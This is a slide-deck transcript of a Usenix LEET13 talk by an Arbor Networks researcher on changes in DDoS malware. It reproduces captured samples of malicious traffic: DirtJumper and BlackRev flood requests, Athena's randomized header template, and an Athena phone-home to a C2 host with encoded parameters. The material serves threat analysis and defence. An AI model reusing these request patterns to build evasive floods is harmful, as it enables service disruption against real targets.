Advancements in DDoS Malware
-
Upload
arbor-networks -
Category
Technology
-
view
1.831 -
download
2
description
Transcript of Advancements in DDoS Malware
Recent Advancements in DDoS Malware Jason Jones
Usenix LEET13
2
Agenda
• Who am I? • Why? • What Hasn’t Changed • What Has Changed
– Better Blending In & Hiding – Better Botnet Building – Better protection
• Trends and Takeaways
3
Who am I?
• Jason Jones – Security Research Analyst on Arbor Networks’ ASERT – Presented at
• BlackHat USA 2012 • InfoSec Southwest 2013
– Research interests • IP reputation • Malware clustering • Data mining • Graph Theory / Combinatorics
4
ASERT Malware Corral
• Arbor Security Engineering & Response Team • ASERT Malware Corral
– Malware storage + processing system – Processing occurs via sandbox, static methods – Tagging via behavioral and static methods
• Currently pulling in upwards of 100k samples / day
• 567 Unique family names tagged last year – Includes DDoS, Bankers, Infostealers, APT, etc.
5
Why?
• DDoS Becoming More of a Threat – SpamHaus – “Triple Crown” – Political Motivations – Anon Ops – Ransom
• DDoS-specific Malware Evolving In Response to Our Response
What Hasn’t Changed
7
Still the same…
• Most Malware Include – Basic GET/POST Flood – SYN and/or Connection Flood – UDP Flood
• Lots of IRC CnC Still Around • Many use hard-coded set of user-agents • Still broken
– Slowloris – ARME
8
Still the same… (cont.)
• .NET malware is still terrible – Most decompiles fine in .NET Reflector – Use .NET HTTP methods – Looks mostly the same for DDoS
• Gh0st RAT variants still popular • Most are not fully protocol aware • Many don’t do SSL / HTTPS • Copy + Paste still prevalent
What Has Changed
10
Better Blending In & Hiding on the Network
• HTTP CnC has always been popular – Tended to be plaintext – Athena recently moved from IRC -> HTTP
• Obfuscates commands • Example:
– a=%5A%47%5A%33%62%57%4E%6F%63%33%42%30%63%6D%56%32%65%47%70%70%59%57%39%78%59%6E%56%73%5A%32%74%75%65%6E%6B%36%5A%58%64%79%64%48%46%75%65%58%42%69%5A%6E%68%76%59%32%74%70%5A%33%5A%71%5A%47%78%36%61%48%56%74%63%32%45%3D
– b=wHR5qGU6d25wZXnzY3c1gWQ6NGFuMWYsMtQ5OTE3ZDu0OTenMTu1MTQ5Yku4OWFzMTekZDY0wHBagXY6YWRbgW58YXJkgDp4ODZ8Z2VlZDpyYXB0d3B8Y29aZXM6MXcoqspXX1nQwHZzqkp2MS4rLkN8dtV0OkQlMHr%3D
– c=%67%6E%75%62%7A%7A%7A%78%68%66%6A%6D%69%65%6C%71%6C%70%70%6D%62%7A%75%6Ex
– Betabot employs encryption on phone-home • Adjustable phone-home intervals
– Specify long intervals to avoid suspicion
11
Better Blending In & Hiding on the Network (cont) • More Intelligent HTTP Attacks
– Requests look more legitimate now • Drive uses randomization in UA’s • Athena uses long list of legitimate UA’s
– More dynamic headers • Paradise borrowed from Armageddon2
– Ability to specify POST parameters • Target search boxes, login forms, etc • Use up DB queries, server processing • Randomized per request, avoid caching
12
Example – DirtJumper Drive POST Attack POST /test HTTP/1.1 Host: 192.168.56.1:10000 User-Agent: Opera/9.80 (Windows NT 6.1; U; Edition Bangladesh Local; ru) Presto/2.10.289 Version/8.06 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Connection: Keep-Alive Referer: http://192.168.56.1:10000/ Content-Length: 2443 Content-Type: application/x-www-form-urlencoded login=q1un7q002imn2843b4qqmk29fsfyk883592qzn4jdgsguc2vy7sqpoi4mlujelbn5levvck21g6j265b48g6f59mocvnzm76en8rin3389c3epk3tgg89i4d796m85gt9hz0wjb4n19w00uh0m9t9xz8857506j08bj2a2r5203897du968e264456ci18b0d3flq2ka4avq9j99e77d31pqcf668654e9xl74u3csa54ygcx45wbg67t47p2p326b00t4r2z99i07z9j2792c10f00l66dt5vnnf90z4xty7kpf1epb1y5l34fwk0939y4c98hs9y856pqc0k03249rfzl640983e35cmw9i607d4zz1k9x3njz2r0v84624566zfoq4afc8c7ku8r31d37ad587cutfn4618476bnp822346s51sms408161jv7m69n2v5i1n4051t99uiru676596nao24j8dcse52a8dzdgcijz0khe0x7elf3w9c1502tjto4332fszyl424g3b911vc1026g79604035lbvk8h31v78b845rqj630ndd42946s18l4832b36ukd2pb917yr60q16e444m36wa9p2us9mj5b7ue4wv5e46m29l4ig8u9lf2wip8ogvv5q8eqj4rkw53k1fo277a3u1m5ca26xrv8fis4337z9p6wbp00u3jc2iq6i6f0rrr4c379x66p0e2z3y57s4kekk370h9w986yd8m5f7l2as0m090v96x42i14qdci43e444h8815jp923545719y2u3b5n450e9c036ws4643zvmp4663j8794w3h5yj71c324n12b3y96pi8487wv6z4xol0rkzq00jtpdgx05gidt8qt7ylyj36y40o2yzwh855x96ftw5qlagzpg2um99u7rap89fca26xrn90015msjbb5417kq037ssje971j8s159g68j0o30agjr2h9zg&......... login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]
13
Example – BlackRev
GET /index.html HTTP/1.1 Host: victim.com Keep-Alive: 266 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Accept-Charset:\twindows-1251,utf-8;q=0.7,*;q=0.3 Referer: http://victim.com/ Cookie:\tPHPSESSID=t0gmf00id9bp4j9gvfsq87kq22; hotlog=1; __utma=226332163.1894789553.1362397126.1362926988.1363866277.4; __utmb=226332163.1.10.1363866277; __utmc=226332163; __utmz=226332163.1362397126.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
14
Athena IRC + HTTP HTTP Attack GET|POST|HEAD /<params> HTTP/1.1!Host: <target>!Range: bytes= <range bytes string>!Connection: Keep-alive | close!
User-Agent: ObtainUserAgentString()!Cache-Control: no-cache | no-store | no-transform | only-if-cached | max-age=0 | public |private | max-stale!
Vary: * | User-Agent!Accept: text/*, text/html, text/html;level=1, */* | */* | text/plain; q=0.5, text/html, text/x-dvi; q=0.8, text/x-c |text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */* | * | application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5 | text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8!
Accept-Charset: iso-8859-5, unicode-1-1;q=0.8 | * | UTF-8 | ISO-8859-1!Accept-Encoding: * | gzip, deflate | compress;q=0.5, gzip;q=1.0 | gzip;q=1.0, identity; q=0.5, *;q=0 | compress, gzip!
Accept-Language: * | es | de | en-us,en;q=0.5 | en-us, en!Content-Type: application/x-www-form-urlencoded | text/html; charset=ISO-8859-4 | text/html; charset=UTF-8 | application/xhtml+xml; charset=UTF-8 | image/gif!
Content-Length: <length> !X-a: b!
15
Example – Athena HTTP Phone Home POST /gate.php HTTP/1.1 Host: panel-gc.co.uk:69 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727) Content-Length: 436 a=%63%33%70%6e%62%58%52%68%62%6e%56%6f%62%32%4a%70%64%6d%4e%71%63%48%64%6b%63%58%68%72%63%6d%56%73%65%57%59%36%62%48%4e%6a%61%58%42%33%61%6e%46%6b%61%33%68%6c%65%57%5a%74%65%6d%64%30%59%57%35%6f%62%33%5a%69%63%6e%55%3d&c=%31%53%6a%52%31%4a%6e%6c%50%76%6d%73%52%6f%66%56%47%47%48%7a%77%53%51%6b&b=uHR5fGU6fiVgZWF0uHVzZDzgxilnMWdaNGFnx3zmYsbpOGnytXFgx3Q3ZXVdtjN2tXVjfG18fiFpOmM3uGJoX2pzxGnbZDkruGJoX2ZzxGVsOmJ8Yipuw2V5fsk0uGJ1f3h6ZiFlf2V8 • |type:on_exec|uid:bac6cde8bbd9b242b7fa9f39b1198226f1a5|priv:admin|arch:x86|gend:laptop|cores:1|os:W_XP|
ver:v1.0.3|net:4.0| • |type:repeat|uid:bac6cde8bbd9b242b7fa9f39b1198226f1a5|ram:25|bk_killed:0|bk_files:0|bk_keys:0|busy:false|
16
Example – Paradise status=headers application/xml, image/png, text/html */*, text/html, text/html, application/xml text/x-dvi; q=.8; mxb=100000; mxt=5.0, text/x-c x-gzip, identity x-compress, x-zip, sdch x-compress ,deflate, gzip, x-gzip us-ua;q=0.5 az-us;q=0.9 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322) Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en] http://www.snpp.com/ http://ask.fm/FlOoRNOoBlE http://www.thesimpsons.com/ http://mylarha.deviantart.com/ http://www.thesimpsonslatino.com/
17
Building Better Botnets
• Use What’s Readily Available – “Triple Crown” financial attacks
• Tiered CnC Structure • Dynamically update code with new attacks • Can easily adjust attacks if current attack is unsuccessful
– SpamHaus DNS Amplification • Open resolvers • Not botnet per se, but… • Highly successful
18
Better Protections
• Store attacks in external DLL
– Paradise: Pulled down by main EXE – DLL is crypted
• Restrict bots to geo regions – Also blackholing connections
• Drop other malware on the same machine • Previously mentioned obfuscating / encrypting phone-
home • More malware using encryption internal to binary • More packers / obfuscations used
19
Better Protections (cont.)
• More Junk Code • New Drive variant discards old phone home
– 2-stage phone home – Base64 + underlying protection – 3 new attacks – Can now specify hard-coded or random Cookie vals – Still reversing…. – Blog soon?
Trends and Takeaways
20
Trends and Takeaways
• DDoS becoming more of a feature of larger families – Still plenty of standalone, but becoming more common in other malware
• DNS amplification will likely make its way into malware soon – Too successful not to – Too easy not to
• More booter services popping up – Many Athena HTTP CnC hostnames appear to be booter backends
• Carberp source code leak will likely create a boom in carberp variants similar to ZeuS
21
More Trends and Takeways…
• Traditional botnets with DDoS addons don’t DDOS much – DarkComet – Some Athena HTTP used to mostly drop other
malware • Nitol, Betabot, Andromeda, ZeuS • Appear to be botnet-for-hire types
• Still waiting for the first SPDY-aware malware J
• Proper mobile DDoS botnet soon?
22
Questions/Comments/Feedback
• [email protected] • @jasonljones
23
Thanks: Arbor/ASERT, Marc Eisenbarth, Alex Bardas
Thank You!